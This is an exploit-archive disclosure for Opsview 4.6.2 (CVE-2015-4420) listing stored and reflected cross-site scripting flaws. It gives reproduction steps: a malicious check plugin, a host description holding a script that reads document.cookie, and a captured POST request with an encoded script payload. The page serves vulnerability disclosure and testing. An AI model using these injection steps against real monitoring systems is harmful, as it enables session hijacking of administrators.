Skip to content
cyberexploits
webappmultipletext

Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities

Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities

Published on 2015-06-12

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/webapps/37271.txt7eac4c3a
raw
# Exploit title: Opsview 4.6.2 - Multiple XSS

# Date: 07-06-2015

# Vendor homepage: www.opsview.com

# Version: 4.6.2

# CVE: CVE-2015-4420

# Author: Dolev Farhi @dolevf

# Tested On: Kali Linux + Windows 7



# Details:

# --------

# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version







1. Stored XSS through a malicious check plugin



a. Create a plugin with the following content:



#!/bin/bash

echo '<script>alert("script0t0s")</script>'

exit 2



b. create a new check and assign this plugin.



c. once a host uses this check, navigate to the event page, the XSS will be injected.



d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.







2. Stored XSS in host profile



a. add a host



b. in the description of the host, add a description as the one below:

<script>alert(document.cookie)</script>



c. save settings



d. once a user/admin views the host settings, XSS will be injected.





3. Reflected XSS in Test service check page.

a. Add a new service check



b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>



c. the XSS will immediately reflect to the screen.



response output:



POST /state/service/166/exec HTTP/1.1

Host: 192.168.0.20

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0

Accept: text/plain, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview

Content-Length: 105

Cookie: PHPSESSID=

auth_tkt=

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache



plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
View on GitHub